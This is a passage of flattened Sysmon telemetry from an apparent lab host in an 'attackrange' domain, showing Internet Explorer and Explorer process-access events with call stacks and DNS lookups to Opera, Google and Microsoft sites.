Explorer\IEShims.dll+3fc44(wow64)|C:\Windows\SYSTEM32\urlmon.dll+10c870(wow64)|C:\Windows\SYSTEM32\urlmon.dll+5b40a(wow64)|C:\Windows\SYSTEM32\urlmon.dll+5bbb0(wow64)|C:\Windows\SYSTEM32\urlmon.dll+5bccc(wow64)|C:\Windows\SYSTEM32\MSHTML.dll+40bd89(wow64)|C:\Windows\SYSTEM32\MSHTML.dll+594080(wow64)|C:\Windows\SYSTEM32\MSHTML.dll+4d2dd7(wow64) 10341000x800000000000000013587Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:08.194{59A5CD1D-9410-6005-0E05-00000000A301}65846724C:\Program Files (x86)\Internet 
Explorer\IEXPLORE.EXE{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\SHELL32.dll+1928d9(wow64)|C:\Windows\System32\SHELL32.dll+1923ec(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c61ff(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5faa(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5a78(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c59c6(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114d8a(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114b56(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+113bba(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+112898(wow64)|C:\Windows\SYSTEM32\MSHTML.dll+529416(wow64)|C:\Windows\SYSTEM32\MSHTML.dll+526cd7(wow64) 10341000x800000000000000013586Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:08.194{59A5CD1D-9410-6005-0E05-00000000A301}65846724C:\Program Files (x86)\Internet 
Explorer\IEXPLORE.EXE{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\SHELL32.dll+19285a(wow64)|C:\Windows\System32\SHELL32.dll+1923ec(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c61ff(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5faa(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5a78(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c59c6(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114d8a(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114b56(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+113bba(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+112898(wow64)|C:\Windows\SYSTEM32\MSHTML.dll+529416(wow64)|C:\Windows\SYSTEM32\MSHTML.dll+526cd7(wow64) 10341000x800000000000000013585Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:08.194{59A5CD1D-9410-6005-0E05-00000000A301}65846724C:\Program Files (x86)\Internet 
Explorer\IEXPLORE.EXE{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\SHELL32.dll+192845(wow64)|C:\Windows\System32\SHELL32.dll+1923ec(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c61ff(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5faa(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5a78(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c59c6(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114d8a(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114b56(wow64) 10341000x800000000000000013584Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:08.194{59A5CD1D-9410-6005-0E05-00000000A301}65846724C:\Program Files (x86)\Internet 
Explorer\IEXPLORE.EXE{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\SHELL32.dll+192845(wow64)|C:\Windows\System32\SHELL32.dll+1923ec(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c61ff(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5faa(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5a78(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c59c6(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114d8a(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114b56(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+113bba(wow64) 10341000x800000000000000013583Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:08.194{59A5CD1D-9410-6005-0E05-00000000A301}65846724C:\Program Files (x86)\Internet 
Explorer\IEXPLORE.EXE{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\SHELL32.dll+1928d9(wow64)|C:\Windows\System32\SHELL32.dll+1923ec(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c61b3(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5faa(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5a78(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c59c6(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114d8a(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114b56(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+113bba(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+112898(wow64)|C:\Windows\SYSTEM32\MSHTML.dll+529416(wow64)|C:\Windows\SYSTEM32\MSHTML.dll+526cd7(wow64) 10341000x800000000000000013582Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:08.194{59A5CD1D-9410-6005-0E05-00000000A301}65846724C:\Program Files (x86)\Internet 
Explorer\IEXPLORE.EXE{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\SHELL32.dll+19285a(wow64)|C:\Windows\System32\SHELL32.dll+1923ec(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c61b3(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5faa(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5a78(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c59c6(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114d8a(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114b56(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+113bba(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+112898(wow64)|C:\Windows\SYSTEM32\MSHTML.dll+529416(wow64)|C:\Windows\SYSTEM32\MSHTML.dll+526cd7(wow64) 10341000x800000000000000013581Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:08.194{59A5CD1D-9410-6005-0E05-00000000A301}65846724C:\Program Files (x86)\Internet 
Explorer\IEXPLORE.EXE{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\SHELL32.dll+192845(wow64)|C:\Windows\System32\SHELL32.dll+1923ec(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c61b3(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5faa(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5a78(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c59c6(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114d8a(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114b56(wow64) 10341000x800000000000000013580Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:08.194{59A5CD1D-9410-6005-0E05-00000000A301}65846724C:\Program Files (x86)\Internet 
Explorer\IEXPLORE.EXE{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\SHELL32.dll+192845(wow64)|C:\Windows\System32\SHELL32.dll+1923ec(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c61b3(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5faa(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5a78(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c59c6(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114d8a(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114b56(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+113bba(wow64) 10341000x800000000000000013579Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:08.194{59A5CD1D-9410-6005-0E05-00000000A301}65846724C:\Program Files (x86)\Internet 
Explorer\IEXPLORE.EXE{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\SHELL32.dll+1928d9(wow64)|C:\Windows\System32\SHELL32.dll+1923ec(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5f8f(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5a78(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c59c6(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114d8a(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114b56(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+113bba(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+112898(wow64)|C:\Windows\SYSTEM32\MSHTML.dll+529416(wow64)|C:\Windows\SYSTEM32\MSHTML.dll+526cd7(wow64)|C:\Windows\SYSTEM32\MSHTML.dll+5259c8(wow64) 10341000x800000000000000013578Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:08.194{59A5CD1D-9410-6005-0E05-00000000A301}65846724C:\Program Files (x86)\Internet 
Explorer\IEXPLORE.EXE{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\SHELL32.dll+19285a(wow64)|C:\Windows\System32\SHELL32.dll+1923ec(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5f8f(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5a78(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c59c6(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114d8a(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114b56(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+113bba(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+112898(wow64)|C:\Windows\SYSTEM32\MSHTML.dll+529416(wow64)|C:\Windows\SYSTEM32\MSHTML.dll+526cd7(wow64)|C:\Windows\SYSTEM32\MSHTML.dll+5259c8(wow64) 10341000x800000000000000013577Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:08.194{59A5CD1D-9410-6005-0E05-00000000A301}65846724C:\Program Files (x86)\Internet 
Explorer\IEXPLORE.EXE{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\SHELL32.dll+192845(wow64)|C:\Windows\System32\SHELL32.dll+1923ec(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5f8f(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5a78(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c59c6(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114d8a(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114b56(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+113bba(wow64) 10341000x800000000000000013576Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:08.194{59A5CD1D-9410-6005-0E05-00000000A301}65846724C:\Program Files (x86)\Internet 
Explorer\IEXPLORE.EXE{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\SHELL32.dll+192845(wow64)|C:\Windows\System32\SHELL32.dll+1923ec(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5f8f(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5a78(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c59c6(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114d8a(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114b56(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+113bba(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+112898(wow64) 22542200x800000000000000013597Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:08.449{59A5CD1D-9410-6005-0E05-00000000A301}6584cdn-production-opera-website.operacdn.com0type: 5 cdn-production-opera-website.operacdn.com.edgekey.net;type: 5 e11604.dscf.akamaiedge.net;::ffff:173.223.168.58;C:\Program Files (x86)\Internet Explorer\iexplore.exe 22542200x800000000000000013596Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:08.415{59A5CD1D-9410-6005-0E05-00000000A301}6584ocsp.pki.goog0type: 5 pki-goog.l.google.com;::ffff:216.58.208.35;C:\Program Files (x86)\Internet Explorer\iexplore.exe 22542200x800000000000000013595Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:08.384{59A5CD1D-9410-6005-0E05-00000000A301}6584www.google.com0::ffff:172.217.16.164;C:\Program Files (x86)\Internet 
Explorer\iexplore.exe 22542200x800000000000000013594Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:08.272{59A5CD1D-9410-6005-0E05-00000000A301}6584www.opera.com0type: 5 front-geo.production.opera-website.route53.opera.com;::ffff:52.57.194.196;::ffff:35.156.154.196;C:\Program Files (x86)\Internet Explorer\iexplore.exe 22542200x800000000000000013593Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:08.026{59A5CD1D-9410-6005-0E05-00000000A301}6584ocsp.digicert.com0type: 5 cs9.wac.phicdn.net;::ffff:93.184.220.29;C:\Program Files (x86)\Internet Explorer\iexplore.exe 22542200x800000000000000013592Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:07.571{59A5CD1D-9410-6005-0E05-00000000A301}6584login.microsoftonline.com0type: 5 a.privatelink.msidentity.com;type: 5 prda.aadg.msidentity.com;type: 5 www.tm.a.prd.aadg.akadns.net;::ffff:40.126.31.135;::ffff:40.126.31.137;::ffff:40.126.31.141;::ffff:20.190.159.134;::ffff:20.190.159.136;::ffff:40.126.31.1;::ffff:40.126.31.6;::ffff:40.126.31.8;C:\Program Files (x86)\Internet Explorer\iexplore.exe 10341000x800000000000000013604Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:10.300{59A5CD1D-93FA-6005-FC04-00000000A301}37845292C:\Windows\Explorer.EXE{59A5CD1D-9410-6005-0E05-00000000A301}6584C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b0294|C:\Windows\System32\SHELL32.dll+b1397|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x800000000000000013603Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:10.280{59A5CD1D-93FA-6005-FC04-00000000A301}37846072C:\Windows\Explorer.EXE{59A5CD1D-9410-6005-0E05-00000000A301}6584C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b0294|C:\Windows\System32\SHELL32.dll+b1397|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013602Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:10.280{59A5CD1D-93FA-6005-FC04-00000000A301}37846072C:\Windows\Explorer.EXE{59A5CD1D-9410-6005-0E05-00000000A301}6584C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Explorer.EXE+1f054|C:\Windows\Explorer.EXE+1f000|C:\Windows\Explorer.EXE+1dfec|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013601Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:10.268{59A5CD1D-9410-6005-0E05-00000000A301}65846724C:\Program Files (x86)\Internet 
Explorer\IEXPLORE.EXE{59A5CD1D-940F-6005-0C05-00000000A301}6476C:\Program Files\Internet Explorer\iexplore.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\SYSTEM32\iertutil.dll+1bab18(wow64)|C:\Windows\SYSTEM32\iertutil.dll+1baacf(wow64)|C:\Windows\SYSTEM32\iertutil.dll+1baa76(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+3a87af(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+1b739e(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+1b72eb(wow64)|C:\Program Files (x86)\Internet Explorer\IEShims.dll+3fc44(wow64)|C:\Windows\SYSTEM32\urlmon.dll+10c870(wow64)|C:\Windows\SYSTEM32\urlmon.dll+5b40a(wow64)|C:\Windows\SYSTEM32\urlmon.dll+5bbb0(wow64)|C:\Windows\SYSTEM32\urlmon.dll+5bccc(wow64)|C:\Windows\SYSTEM32\MSHTML.dll+40bd89(wow64)|C:\Windows\SYSTEM32\MSHTML.dll+594080(wow64)|C:\Windows\SYSTEM32\MSHTML.dll+593ffd(wow64) 10341000x800000000000000013600Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:10.240{59A5CD1D-93FA-6005-FC04-00000000A301}37845292C:\Windows\Explorer.EXE{59A5CD1D-940F-6005-0C05-00000000A301}6476C:\Program Files\Internet 
Explorer\iexplore.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b0294|C:\Windows\System32\SHELL32.dll+b1397|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013599Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:10.224{59A5CD1D-93FA-6005-FC04-00000000A301}37845292C:\Windows\Explorer.EXE{59A5CD1D-9410-6005-0E05-00000000A301}6584C:\Program Files (x86)\Internet 